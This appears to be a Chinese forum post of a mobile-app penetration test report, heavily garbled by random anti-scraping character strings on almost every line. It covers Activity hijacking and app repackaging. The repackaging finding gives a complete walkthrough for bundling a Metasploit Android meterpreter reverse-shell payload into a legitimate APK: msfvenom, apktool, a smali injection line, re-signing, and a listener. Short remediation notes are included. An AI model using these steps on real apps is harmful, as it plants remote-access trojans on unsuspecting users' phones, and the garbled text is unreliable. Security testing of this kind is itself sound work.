! H- \% ?' ^" F* V& Y8 h S; i' P; \4 @ 0 c0 e8 m% E, v( P9 h, B- S

# }4 s. n* Z+ V5 e, k% d( n ! v, P' e& ?& O o3 x/ a 1-2 测试结果 & S6 b! V2 \$ j8 {8 }" X7 U5 L) f9 k 0 J J3 \* w: W8 F" |* ^

- b1 _# P) q1 O/ j7 N/ D# E, L( J% f/ T6 ^$ y

( s; _+ r* {, I% O8 b 9 j s6 m/ J$ e) _' z   ' _0 e e! {/ }% p - Y" A2 w1 ^6 N2 s5 M7 @. a

9 t9 P# i, I; ?& X5 {, q7 | " |6 ^! z$ |$ U

! f$ H6 Y+ l4 a* k i8 H . r3 ~* ~# R/ h$ b' P 2 检测结果                    / N9 y3 W; r8 g* p & b1 s# y$ S: z8 N( I

( I1 u. h$ i) p5 f% ? $ _4 \) T- j. Y; y0 ^

; f9 a: c- g* C* H" U- ? . X+ o7 d o4 s3 q 2.1 某某某 4 X/ r* p9 K0 H* x 3 H ~1 S( s9 F+ a8 d: D1 b! l

* Y; s1 E& L$ E7 h" G2 q7 O d( j5 ]7 ^0 V/ z# n' t3 Y4 H% I

; ~% E4 F, q, K # Q5 x! v' {' `- ` X) ^ 2.1.1检测目标 3 W- `' W. B) A9 y* } ) T8 B8 n9 U5 W6 Y0 n

A' r/ i6 K+ C/ y / y7 b* r% J/ t* _% }6 r

, x" C1 Z: w7 h3 d8 D# X' \$ W% a0 e$ v6 b$ G" ?( o 目标地址: 某某某某某某APP 3 u8 X) W6 W7 T5 j+ a% g- z4 b - C8 i! n6 v; e) w% Q

% x* p4 }6 V4 E% ` {6 A1 l 8 a: ^" w. Y4 v* q9 o9 p2 v* z

% J. i: m, T6 l! r$ d, k/ i& Y0 q7 R# e5 p2 R! E8 r9 P 2.1.2检测结果 3 Y# y3 M5 i a+ J" J5 ^1 {; z& h! f3 T . h! \, z$ I0 N5 w1 |7 F0 x, G/ B: i

6 c( H5 F5 b' Q! @+ s X% N( B 0 `( Y* C& R) G. ^

- Z0 J, a( a' ?) W# u$ [! ]% X9 ~# [- l% V6 y+ m7 j- X0 ?7 [1 o- H" f 2.1.2.1 7 D6 K% G/ N% B& {0 _: z 1 B6 K* z" A' S; x W

' X) D: m# Y% W5 y, j 8 e0 `6 O1 O2 @, S4 O( k# b

- S/ P% t! u% A. H# f! F ( K! M. p0 z1 g, Y3 p2 P- i 漏洞链接地址:某某某某某某APP ( v6 d2 U I$ G) [1 `$ b% @- ?3 e! }0 p: F' y

' Y1 e9 ~0 L# d% e' W$ N* p / u/ d2 U& `: ~

& a4 f6 H% I# h& p! _( E! t/ ]! e: w4 c - T$ i: e9 q# q2 E" m/ I5 U7 q6 A' j   , X" o6 g5 O: J9 z& e8 c 4 E& k, f0 m( q. R3 K

# f$ v! K3 ^- m, E- X4 D ! K6 K' k1 p$ M

3 z. E% K5 @# z7 T K7 e E. z; o# C! x% f6 a6 U @2 ^ 漏洞分析及取证: 9 r+ V \9 u/ k( c1 W) \* n3 L$ D! q9 w' x# Q u- v5 q

% E% o" q& ~- u' @* f) n1 ] ( q, [) D0 J' q5 K% `9 ]

# u5 y7 u& l. F7 @- u( a/ R' K8 _, `: h0 P                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: - U, E/ E* h+ t5 V) ]8 | 7 x$ Z4 U$ K, G: s

1 h5 |$ @ A6 F( R; H& ` + e4 w8 b# M8 H+ S! U7 G0 K

- \& |+ P9 ? j% P7 o* J* F, ]9 p 4 R7 Q; e/ N1 C& x2 K" a      7 i9 `6 S& C$ g( i, X $ N. t: R+ O/ ?( T6 b# J3 L7 u

8 J4 D8 f9 v" c/ R Y 0 H$ I1 o, z0 A2 ~, L U& O l

: }4 _; y) V! h* ~0 s; R5 a0 v: @ m! L* X+ K                       9 N/ u" [# J& n, I$ m9 j3 L7 ` # a, A# Q/ l; e) S; ?) J& n

+ c; q! g8 h) P% T ) ~. k! b) c. Y! ~# P' V

: [( t' s1 ^% e: i ) R- Y$ b$ C" g 3 g3 V7 q! r* P 2 F4 i" n/ [1 y0 N

+ W H. j: Z1 E 5 _" P4 E& C5 _: X: y, k' j

, o/ h* J: E# p+ U$ R , c2 m, {; d! Z# { , w, |; q6 F! `' b& u, d8 y% k ( n* ^- ~2 A# b5 W' u2 O

}2 N" j! `- H k$ o# E6 E; e$ A 5 ^# g, q- I2 |; d1 t

7 ?/ l# j) ?* P) ? 4 Z4 y4 ]3 Y: T, r. o5 ^ 5 u! M+ H$ d% Z3 h 0 g: d t2 B; k7 K/ H, E

2 b6 I9 `$ ~" ?& a6 p$ @ z+ K 2 c& W, D0 S$ g7 I. z# R

0 R9 n+ u* Z! G& ^% n% ^ $ {/ j' I$ [! ` 漏洞危害:高 / S' j R9 U4 c; y / D2 _9 J- G- U& ^9 Y" b

5 M9 S6 ~% t( x* @; t+ i# s ) S! h" d( ~; Q X' X
0 R4 c5 {* ~* f L9 H+ X9 R3 W' ] $ N$ F* i s: g5 C 1 m f6 \8 k5 e, ]2 U, s. ]. A# r2 ~5 B1 O7 K' c: e( c% _$ d. c0 \( p6 M& C I9 q* o2 b2 ~) z' t0 Q3 o# G- c3 @9 D ?$ g& D/ b8 z% O; n, e) K; ?. E, b+ j2 z9 k2 t5 I+ d* o4 L, m3 t, Y0 P8 U' ?0 J) Q+ H1 `% _6 d$ W: N1 q& S) h. K8 c! }9 \3 ^' r* ~+ J6 p: v9 f$ w/ f( U" L- o0 {, f7 A8 t1 `; ]1 `1 U% F- e4 W: b {# L' H( k2 u' F$ F F& p4 J! X/ i$ c7 W) y: i0 r! x, g2 w3 M+ P: Y' G( M' q& X2 f) D2 r4 O/ A8 Q3 o% P# \1 Q- P% x: V+ d; P- p& G5 X/ l8 h8 z- q1 d Y, Q7 r, j4 D" S$ d; m* k# {5 y4 {& o8 y+ s# u0 t' ~" h4 n+ K# n) j3 q1 _9 f) I! P: v* w6 n2 f) \/ V+ h; g6 N, \1 D; d( w$ l3 k2 \% g1 B: J! v8 r5 L4 n4 e1 Y* l2 s
3 p" I4 K6 O3 e ' O0 z# x' z: ?; w6 p, @3 N

: A( U+ x; ~- d+ H$ c % O+ t9 K* h1 u. G; }; `" f 严重程度 8 \5 ~0 Y# I* a2 N8 Q1 [0 \! j; w3 R2 _9 V# E2 x& Y; F

/ _( x0 |7 P4 I( g' t- X3 @* B9 ~* e" B& L2 o, i' G7 Y# {
' M3 b8 c( O# ^! h# f7 x: J! A2 m+ L0 o! T: N' c; m4 K3 J

0 W% j" y" p# t * ~' R, R) N$ u( e# G2 [8 G - C- f- s, G' A r% w* N 6 K/ H7 {0 I+ B2 k3 |+ _

( _. z* s( m( f4 V I 6 i4 W2 \) E; K& O% V' O2 {
% F& v8 k5 o Q" `6 k( `( t, t0 s, g5 A: p" e2 n. V( ?5 f

, G# z; a c$ T! b" E/ e% ^ % n: Q/ {0 l: f! D {2 @' f8 d3 t $ b: }' ~. A7 k0 h8 M! P. G # _' p' r0 b! [& K, E

- ]3 t, u+ j4 n8 ^. q 8 A5 u6 s# n- E ^$ K
2 r. u8 H' K; ^/ ~% m' v4 C 7 J, u: m0 r" s5 ~4 [

5 @$ Q8 ^5 ?. k# u 1 Q, s* f) B0 Z0 B; V , y. @1 {* e E. f% G& H p2 E' P4 J7 G7 g w7 a

$ A, v n& ? H/ V8 o! R) F8 o( ]" p1 i5 i. s6 O$ ?
0 x% p; f) e* T& e5 J+ [ 7 X, q5 }/ I, F6 _0 A8 ]) i

- d) d+ f# q& r' c- c 2 K' g' g% l' h: p, s   7 T( Z, j7 @- g/ Y) z0 O! p2 T5 M8 x7 g/ U- E

9 c6 W' h9 p* E, I8 K5 W! m- `: }' a, h
! B* U& G; z! n1 B2 {- f! j8 w- ?5 {! N* Z, P

: Y7 c* E7 J( i7 K 5 v5 o6 K3 `+ s$ X + P7 p' P+ g* o& c6 K1 C2 ?2 f( g - ~: S4 U1 |# e

' ^; r8 G2 @+ [ 7 X, T9 p! n) w5 m g% G
9 q' j) K' @# [% H1 J2 w - }$ O3 v, `7 W/ }- `* `

3 Q' j* L0 O& z+ x $ a" A P: { X5 i7 i8 v3 R   9 C0 c2 k9 R, i/ [! k& ?$ O# O8 b ^4 n' p! l" F; e5 {, U

, h) N3 v% A, r% O. a 4 M j) y: x9 m4 b+ \, x
( [1 R/ X$ p* w3 c Y: e. F/ o: @; _
* e. H0 d0 c6 F6 X# Z1 {) R * m& a9 [0 j- u6 {1 r' \8 ?8 O

! d3 e: \( w% v8 U/ a5 ~ 4 \6 x/ Z/ b* E/ V) e' z   # _6 _8 D! |. k8 W! i . O6 p8 t- ?" c3 m$ q9 L' X- D

) ]; D1 ~( X1 U. P$ C g % k" R' S1 E* d: `

/ N7 X$ R! ?0 J 1 A( h+ c3 Q: d. e" [4 n5 K8 E6 c' J 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 : {% g5 I" g. c/ `) v& ^ 2 I0 ]4 O$ _+ e1 B0 E1 w

- ]0 T9 o" p8 O' ] 8 h ^* d- w" r t4 C& n4 u" y

* w' ~* g4 C/ x9 d8 O6 z$ f: t2 q* G           : I& b" H# p O( R) T, d) ~+ o# l8 E$ i* p8 R

/ j( i( E: H! n & S) c: v8 Z4 k0 s- M; s% ~

# h9 B5 i [/ u+ R; j$ m * O8 ^3 h# K" h$ E1 S, p   ; t1 Y' g1 y- N) |0 B( r 6 r( H- U9 q( @1 ^( e$ s

9 ~; y$ j- Q, x& `5 [+ t + k6 T9 x( y P$ |' ~8 ?0 s& z0 J

; d! w, O2 H/ R+ N + g- f# e$ [; ^- V: h2 i 2.1.2.2 [: j2 R- K; U b @5 x# L" B* } j6 b$ ]

! j( l" n, z% {! p2 _# Y$ f$ G( T8 }9 U* d. x

' Q0 E2 F) M0 q; N7 I ; q1 |! ], J: x9 ^, K! V% Y: u, b 漏洞链接地址:某某某某某某APP - B# P" R7 g+ k! }* _$ ]' C) R , x: c V: R1 j3 F* W5 e: t$ t

. q% P; @( `8 C# g9 ~* R * l. Q4 @1 p: x- {8 q

2 l6 x' s8 l0 Q) A& g5 y! ~2 Z3 e2 A, j- k7 y 漏洞分析及取证: 1 L8 x! e$ t, S; ^5 s 0 m$ ~2 x+ A& d: c9 s

! r! B4 l! @' o9 z8 E * `9 C* h8 [$ ] {2 O

* j" O5 x/ d: Y & x3 i2 _! A% ?% { X                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 7 Y* J4 S% [! k1 W1 m E + a2 N$ q/ ?( I

5 x, g+ R3 e% l* O0 r$ C* v8 P0 N , K+ n8 X# z9 v- s% T3 G

& L5 b8 v, {5 b* [ J# G& {) V: r, R2 B. Z9 ^ Metasploit 生成木马 apk {& y N8 x# Z2 [. a. N1 f+ a" u6 z : C) w G3 {3 K) _: k9 H/ W1 P; R

& N" t( x N: u. s) U' F; a/ _& B ) [1 a! d: Z/ v/ L2 W ?. Z: A

3 b- P. S4 q- W! p4 x# P( z- z( t% C- @/ F9 W: _) r% ]9 R9 z msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 1 x' Q9 x8 t* y$ N& s/ n( ~ $ i9 \; Y" A% K% \. X0 s& o

0 [1 I& G ?6 ?8 ]* v. _ # D( y4 g; d2 X2 e X, a: f- q9 m) d

+ ^; ~# O8 ?( S8 `/ H/ d, t5 k& K" I( j* M( ^9 j4 c 反编译目标apk和木马apk 6 x% }/ q& Y% ` F 2 Y, b. z# w6 `! }5 \

- Z+ Z6 w. n( k0 [4 @' @9 [* \ ( \5 V/ ?. o. c4 |

" w$ L0 T3 A- h7 l5 j- k 3 z1 e$ L; n5 u6 r% e! M2 b) P apktool d target.apk
# ^2 |* x+ A' w9 W. k' Y7 G 2 \: b7 D% U" X4 U apktool d cockhorse.apk
: v! m! `3 W: z& F3 ]' C& L. C6 s 3 A) f. s6 X4 S+ w

. U; r; Y: v% O0 ?- P 7 N; f4 H+ Y; I3 X

2 j+ C( h" }* N/ Q' h J: G ; V4 d- i5 d G' }: @ 木马 apk 注入目标 apk ) V8 A, I+ u0 l" j 5 B4 {" a4 ^) n3 L) J8 o: w X

: \! [9 r" _! o . ^ S; x* P; g% s, M

# }& ~! J# |5 H) J . V6 h/ C8 ?, N' T2 Q/ C) F1 o 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
: t+ f$ {4 g6 c! U, P* {" a( t! x) y & ^/ R) ?4 t# y; h invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
n) d }, C$ L4 b- s$ ` - Q# U1 q; \8 a" @' N' X

! b& M. n" V1 P% g' ] 3 b5 m6 e% `: _5 B

]! ]. M: g( q( b 6 y7 x" |# K" W" ~ 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 " @( L; W: r" ~5 h; Y , J) K& K- R/ K9 E, Q4 \; K

+ P. N. E/ A0 `, g! R: h0 J - ?' _- M9 |7 M: l

* \: F/ u9 ?0 [ ) ^4 x* G* Z3 k3 M3 W5 K6 v 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ ) f* i- r% C; ~! Z$ k! M) H) P2 N; {! a# f$ X2 |8 L

# N/ g. e% z& h, O& n 1 l- Z3 D4 y) D8 K }3 P

9 d+ y$ w8 e; g" }9 r$ S! W" @% O9 a" u' d/ z/ A; w8 `( p5 y 回编译生成最终 apk - [; W* Y- t( d* l/ y! _, S ^6 I Q3 J( \+ \! ^$ Q: V* j

& @& K6 R" N R: C/ r+ i. i ' Q( w0 Z! V$ `# g# A% |

* q( ~" g _# ~. Q" n6 p2 `! \, G9 R! e" S, P 重新打包 8 z& M' N& E. o+ Y! A 1 ]+ O6 c$ h' q4 _* n, ]; v, \

2 _6 I" X3 D5 y$ f$ g7 m) _2 }: R! m) G/ |( [8 P; u) T! o" |

5 D0 K( g& v5 @ k( K ( O* A$ U3 N7 B& m/ D1 Y apktool b -o repackage.apk target_app_floder 4 u0 d4 M# A5 r% O a5 r% }- q 9 \7 a" w4 k% S" n& L! T/ b

% z) M- t& T0 e, d2 a& Z Q1 L! C# v8 ~, y5 v$ V

" m; H# a/ j5 M6 ]+ E; h , o4 Y* S) v9 s: `& [ 创建签名文件,有的话可忽略此步骤 6 L/ ^0 |3 u: T+ O5 e7 ~ / d) E3 ]5 P% T( h: H

) P2 q2 `- {) G5 U4 ^$ w1 @: O# a0 v. o) N) Y

, K- H1 t( c! R& W2 c- a' M 3 w0 b G0 ~ @ `. I! O! [ keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                / R+ {! B/ ?0 D" e $ H% k- p# X5 H G% U' @

& W H. y: @# `# K- B( ^0 m4 y 6 }8 |# T4 s; g

* g& L2 }$ c: d+ U 7 e( F! K8 m0 ~% B. q5 c: I 签名,以下任选其一 5 \. R) Y- k5 I7 Y* } 8 b7 q3 Y5 i5 U& c4 L* g! e

6 j8 i. H, m- z7 ^2 p4 ^ / n0 e" ]3 S0 E6 g& [& t$ @

7 G' _: |7 w2 f- F6 j) A # P( j: O" T9 P/ J% A0 p$ ] jarsigner 方式 5 }3 z- r0 e$ Z" O" a7 X, Y& E& ~ G9 Z2 x2 C8 H. V/ ]

; g* N' f p1 B % V+ ] s, X' D6 E. ?1 Y- Q/ m7 {' E

. U6 }0 w* N( } 3 ~8 L0 C0 K- w$ o8 O. l; N) s jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname # W$ p$ W& Y* N1 q1 p) k" v 9 y/ }0 A _9 r! [

/ L5 g, l/ m) i. A" n 0 F; E9 H6 H2 V: w9 l# A3 d, A/ _' H

5 Y8 ?3 ^, U) v# c 5 D: d4 J. N, J! T apksigner 方式 7 c' g+ l, T. }( _5 U7 c+ Z3 E# t* o1 B) Y: E- Z' Q2 _

" h% `8 R, c+ U ; ?6 Z4 ]3 E8 `4 i( g7 \5 M; C

2 W- R" l5 @ W; x( N 7 r$ {% U, p" m, K, W$ O& }, T apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk v! U& W! A0 X 4 l" W4 Z3 P. l, m! a8 ?1 R

) {$ q- z0 z+ E, K" \9 z& f" B # R8 R9 Z" N3 }+ X* _( l

1 K9 X* F* t8 g* D & w' m" m2 \" \ 如需要禁用 v2签名 添加选项--v2-signing-enabled false 0 v, p$ { O: F$ m ) i0 r O. u% k( ~

& d4 f" d6 n2 G* G5 @ ; v8 f5 F: _5 J5 g. ]3 D% |

: B* P( P3 `. G- a, W. s6 [ : \, h% l1 ^# I; B9 I 验证,以下任选其一 7 c& R( d3 |* ^0 D5 o) y 5 W5 r9 Q4 `7 Y: Y/ G* s% P

' S, ^8 Y, c& m4 p! k( B, g4 f2 a1 Z- u9 u8 t X+ K

7 I/ L/ |0 O* l ' _6 I7 D' e {: g7 F2 h, { jarsigner方式 5 m! ~. q5 l( V: Z4 m 7 D4 V9 M% {1 [1 _7 j

1 V6 E: k/ s9 U! \: o & |2 Z6 ^9 }* O0 K1 x! V

) q) ^2 p, f% ~$ T ! [' k+ g) a8 a% Q jarsigner -verify repackaged.apk 7 I2 A2 c; \4 }' G, ]7 g; ~$ g1 x1 x. H4 f) S6 D+ y0 L

0 }" i& H$ ^# P8 N# x+ C5 H 1 F( ^0 i4 C9 F0 z8 W/ ^

( p/ H& _2 H5 t: |: |; w ; Q p9 h8 L3 n/ `2 S apksigner 方式 ) E* e4 [7 d, F# V) p7 e$ T 2 d6 H1 @& i6 ?* j2 x6 h

9 U+ l& X( f! v' f- W- w4 l% O* o/ Q8 z

$ ]" Y( Q" C3 ^3 {" N % f( ?6 j3 n0 [6 q9 ?, D apksigner verify -v --print-certs repackaged.apk * } x' h5 T& A @ 7 k+ U; ^6 \0 x$ d( D+ i

0 W/ M. p+ u( A& a1 f 7 w, T) S3 m/ i, Z

3 T( G2 c; R3 x; b; e* M: F% c& l# i keytool方式 " d. Z7 B4 P5 Z+ H8 L& } 1 n. Z! c0 X F2 i

) X6 D; T- d( G1 N: [& L% T& C: i, l% ^( ?* e, s8 n

' t/ C: c L% ~% @( P, x, G3 d6 F. _5 m& w+ s) Y! b) q7 L1 I$ c keytool -printcert -jarfile repackaged.apk ; c* r" [' P5 \& z0 y* X4 p* r2 z7 G, ?

3 {# O! H& ~% }3 C $ `, N1 q! K& Z3 }

+ {+ `, U) M5 E/ _7 d5 D$ y 4 h9 ^/ r1 d5 ] 对齐 0 T$ _$ S1 Z# ~# t. _$ c) K3 f8 R; ^3 w0 c4 j5 U2 u

- k* d9 e' G7 X8 f( `; M 3 f4 y4 U$ K/ ? Q

7 H( a [' k. N - C5 f4 _7 P- b. n+ d) M7 } 字节对齐优化 1 s$ {" b; ]: ^+ z& R2 \( V / ~) K! ~; |' S8 }

9 f e, J+ O0 O( W " X4 l+ H s. N' w8 e

$ n# Y* v# O$ G: x4 a8 ^! {) P9 K! k: J% F # o1 c' I/ x8 v zipalign -v 4 repackaged.apk final.apk ) n6 |! L$ r# f# c) N& G" c$ y$ D9 z8 T# S

: V4 \# R' |# @! H4 B# k- Z3 _& T2 u

# u I9 `8 H# y ) O9 d9 Y' s; W 检查是否对齐 , I1 f" ]4 w* J6 X: p2 F% ~0 c3 s' j# H" v7 {4 B2 K2 Z5 K. W

4 k; B5 n' L0 @6 } 9 d& w# P$ v8 H' b# `" N6 m

/ W$ j5 S; ~$ ~& O% A8 V8 `! _5 [: E4 ~" j# Y zipalign -c -v 4 final.apk $ j1 V0 l$ x/ x" ] 7 ]& l$ |* w2 n4 F/ v2 B

) L- D8 q7 t M8 b# K8 l ( ^# C/ }: v) X- z( c, f. u9 r

: S5 E+ }* n$ P, C 8 y8 L( f) _ {# @4 \ 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 : c; r. m2 I9 J. a8 P - y+ p. ?& i$ y

7 w) Z& {$ L! ~) B: ^, S * Q; x' y- a9 d

1 c0 C+ m2 Q; Q9 ^+ g" c, g4 w. w 9 n) ?/ r7 k3 L6 C6 Z* }: w 启动Metasploit控制台,配置参数等待上线 8 c5 `6 s) R( ^- ] 6 f" w( e" O1 I8 }5 m

% c/ z* e2 ?' w/ E* I ' g& w5 I4 ?! N: `0 _/ b

# k4 S7 P. y* m$ w; _7 b7 U 6 k- r0 Q: z+ c" k+ g" N, c( i 在终端依次输入如下命令 ! C5 e, f: z+ f ~: B9 D( `/ ` r+ v1 }

+ B- R5 h0 d @8 E _) ]/ l& t" `: H5 D" M i- h

. |5 ~& E4 s" E r3 o/ w X6 s3 A! U( |& o3 b* ` msfconsole 5 i, x* Y% o4 T7 l4 K $ d7 I9 e! N) z* N$ q

" n* T# o% w, D2 _/ H4 M % V- ]* r" g& }" j }& U* j

k; r- ~- r5 |: W7 O z5 G) w, r& \ 8 m9 {% S5 R# {. Y use exploit/multi/handler 2 j7 [3 ?1 Q% D' @ ] / _1 P$ b7 _' h3 s

V. O; }5 B7 J/ D ' [1 ]5 @, \" G$ Z

* Y y3 P, u0 z% I1 E . }/ i l0 n5 ]. D, x; _1 x; Z set PAYLOAD android/meterpreter/reverse_tcp ) E3 ?4 f. q, `# o ' \4 `1 O/ X/ l7 _/ y7 Z0 z3 P

' I; d: p( a. B* a3 ?6 c7 |; w 7 r& A+ Y: y1 X! f% a

% Z/ F. I; c8 k5 t/ `! N - M+ z4 i% D! q. J z+ l set LHOST 192.xxx.xx.xx / u5 d8 O! ^, f ' ~1 ]. K z( w) M- q) K

9 s5 @0 n: j+ Q+ E( [ 2 L& I7 P0 C4 O- r- O

3 U% n! A2 E* j2 _& |. {+ }1 n7 }) R# b& T9 R/ F, `( n, N set LPORT 4444 / u+ N2 m: ?/ f1 g) p 4 ?$ F* \' z, T# ]

( w3 w; @+ e% f, ]1 P - Z9 Z2 a( m% M7 n3 @ g

, \! K* k4 }8 Z8 o z9 u, G0 ^ ' U7 m$ M# a/ P( g7 { exploit * @! D$ y' E: A7 e) N. T) { _5 T( F$ V% r% l* P

0 L' H% _8 d% C ' f* J# ~* \* y3 h+ C$ I

* p/ {0 u: x: c- i# \, R 5 _0 v' f p0 v/ L1 k. ` 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               , f8 m8 D9 b" R( a/ k6 ?& J " E M7 h( q; p6 m2 K1 P0 x

$ Q- D j/ {; T% w9 V( L0 l$ I% _ ; K, G# _9 L. a% d1 N7 d

/ T2 [* P3 B- C6 t8 d- \& @# V5 X 2 H- @$ }# X* Z, n' |& c 漏洞危害:中 5 e6 q! L8 w) A) c( H1 l ! _8 X0 A. Y' e3 S: c4 R

4 T5 | m1 k. A4 I) P& _" a, j ; {' f3 L& c* Q4 H! K' R
/ _/ b0 q5 M# ?8 x( v) }$ y0 T$ `7 W7 ~9 @ & r( N/ q" P7 T$ ~; V5 [4 f' z1 @/ s: s 9 z9 W, @1 Z, R3 J" U x9 M1 ?9 v3 K0 N. O: a4 s1 J! K; L% T C. r. q3 u+ `$ ] Y2 d" N, X4 ^9 j) d6 P2 S0 ]4 C7 {: y. a6 F. J, Y b5 p0 X* b& Y- J' Z9 K: O0 {) a* P/ F' g: g# U( N+ W) ^/ P1 D j6 w9 w7 \) t* K4 r0 r. G2 ?3 X9 d/ V& k& Q! ?; {9 z0 z" c' y$ C7 q U, \$ C( B. a! e a6 [/ m+ d. W& E; q4 X; y" ?5 p$ I; `! G: b' Z4 x$ k9 \* h# _6 ]* c% N8 `/ Z0 @9 @! `, d2 g2 x; ?' r d. A" N! E" a: q9 a1 c5 X% |6 f* C7 G% E. @& o3 @7 E- d8 E+ v; k4 o1 ?0 C) Z* @4 b6 s& L! n/ }; H- T4 ~, n3 h4 z a, ?8 [+ e! J5 Y+ y/ `+ m7 Y/ W) B6 e- v) ?) d! A- Z; e+ S: O) s" Y6 B
/ _; h( ^! r4 J' e 4 R; V$ J3 J0 ]" G: F

; L* A- q }# t 2 G8 F7 g; m) t2 h; F 严重程度 " F4 t% j Z7 F4 X 9 V& L1 M, a4 |3 S& @" V( \

9 y4 t( h5 X9 G0 Y, k% O7 o9 e- J: \$ A
/ K. u' ?0 } N0 _7 G1 J$ _* @ ?# x1 H9 Z# h2 J

5 `0 S( K% v; u9 K; \ + S/ S1 W* Q$ N0 H' V3 B : b( W# l/ H9 R: [: { 7 \4 A8 I" P4 |& S

& u {% \ |6 v/ g. a/ j( L1 r+ S5 ?0 z
" p8 j0 C' }- x & {3 g* c( s+ v4 o9 {& M2 ?! l- ~

9 I% G* j6 y6 [ D1 v1 F 6 E- U+ O8 ]& y( _6 s! Q ) ]; o9 M( o) E1 W$ }+ n6 a 1 y+ t8 W$ {9 L

/ H8 N9 K$ P3 j4 x; s) h ; ? Q) J( t/ d: y! W. O, `
1 j2 G) J3 t$ r s6 n' F8 O2 \* ~! C% M9 e- M( p! w$ k

1 l9 a, I6 }2 W3 G4 ] ; D* U0 x" Z+ ^1 j3 I m' L6 u$ h. e) | % K8 T Q+ r' P+ J

5 @9 s/ r$ i, ~" m7 w- W' z& C2 D! _& o% U3 u
4 T$ c* K; ?5 B! \ 6 P5 _0 I/ U3 g9 M5 _* V ' @8 W5 h" M, t3 X 5 D" O5 |7 f! Z

3 Y0 }4 U8 |- _3 v! G, f6 {/ s ! i' O. A- t2 e7 O! l' I   t+ @, s( l- _) H P; C: e & B* Z; w6 _. i& ^5 @

4 M4 c* |& d* d $ [" P1 _8 H& T `1 `
3 J. K* l, D( `5 p | 9 ^& t6 \( {" V& o& l5 s

* W: E( N& N& _: i' `% H4 l: V9 h , q5 v1 s& ], O8 A U+ I) N : F& G/ r7 `; w. U$ y; ^3 |/ }) p: u# W, S- h' o" n2 l j

/ B- w8 u+ x1 y% s* B8 b" s) X! }1 v0 }$ E6 I
; w3 U3 `( U9 B' ` & [; ]7 n: N, d: e! O! I( E / `5 ?( |) F6 m$ e. }* N( J- L ?9 f6 a! m2 o& i+ K6 e

( t, O( S+ p$ ~ ; v5 X; F( I# }6 P( A& R   ( @) A1 X1 {! ?. H1 z3 f 0 P5 Z, a- B* | s

+ J& t2 ^. P% @. ]2 k 5 r5 h$ Q+ u1 R
5 k% X; B' l) K( ]: G% D " E' W% N+ R1 m$ [' c0 @
( [+ x4 W8 \( P6 Y' p3 t- n% h- g ( C ~3 l9 R7 L

. k; m; z+ a7 k, k 2 }5 B. y4 e. D: @   - {6 B7 F4 V) q0 s* F ; m6 K$ ?, |1 S

+ P# W9 n, ^) Q+ [" y4 E3 J + u% a9 V& ~, C. ~

; l: s9 P3 L& I7 H7 ?8 O2 K , `3 v: j4 k- I 修复方法: 9 h9 g `* R' o% L) X 0 ~4 j% q# Q: a; n

0 T4 u; t& n: [3 e, d 9 J6 }( \& @8 V

* l4 [: m6 u5 z7 `; n* f4 a o9 i' Y& `" V- x/ O* M. p1 v% l               1. APP 启动时应做签名校验防止二次打包。
( ]$ S5 P; a+ ?$ l# Z, c6 Y, @3 a5 h8 E! t 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 4 k/ Y+ e3 v# D' j5 {! ] / e! z5 v4 k% \/ X) L5 p8 X

, Q5 d0 ^6 j# o A T: c' R! g5 g3 ?) S ! _* B% t9 @' K. q% C! G" N 6 v* S) |4 \2 `# @; [

, w9 I j) W& ]$ T* c. L 7 g( w' ?% |- z, u# {2 E" k, x   ?- w. a2 Q5 l" t% E# p- k+ D8 G# ?4 V# T7 F; u g

- O1 q; L( b9 W8 T) F 0 S( Z0 Z8 c1 C `4 F 9 m+ }" G7 K# d1 P " U C R0 @. r. i, D1 M. n

5 P5 ]5 ~; i! E' p/ G* V. j! _- C w7 N: [6 V) R
! p1 b+ T$ `2 }2 d4 Y, s; C1 B3 d9 d2 m6 v% c3 s

+ P6 N% F& M2 ` x! i/ E A% L4 Q# `6 B( R7 O& [- g
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表